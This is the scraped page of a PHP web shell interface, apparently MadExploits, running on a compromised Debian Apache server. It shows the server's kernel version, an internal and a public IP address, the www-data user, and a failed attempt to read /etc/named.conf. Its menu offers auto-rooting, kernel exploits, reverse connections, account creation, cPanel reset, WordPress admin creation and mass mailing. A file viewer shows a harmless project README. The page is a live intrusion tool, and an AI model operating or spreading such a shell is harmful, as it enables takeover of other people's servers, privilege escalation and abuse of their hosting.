Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.29.190
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
leksykografia /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
README.txt
889
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.txt
README ====== This directory should be used to place project specfic documentation including but not limited to project notes, generated API/phpdoc documentation, or manual files generated or hand written. Ideally, this directory would remain in your development environment only and should not be deployed with your application to it's final production location. Setting Up Your VHOST ===================== The following is a sample VHOST you might want to consider for your project. <VirtualHost *:80> DocumentRoot "/home/kruk/www/szkola319/public" ServerName szkola319.local # This should be omitted in the production environment SetEnv APPLICATION_ENV development <Directory "/home/kruk/www/szkola319/public"> Options Indexes MultiViews FollowSymLinks AllowOverride All Order allow,deny Allow from all </Directory> </VirtualHost>
Close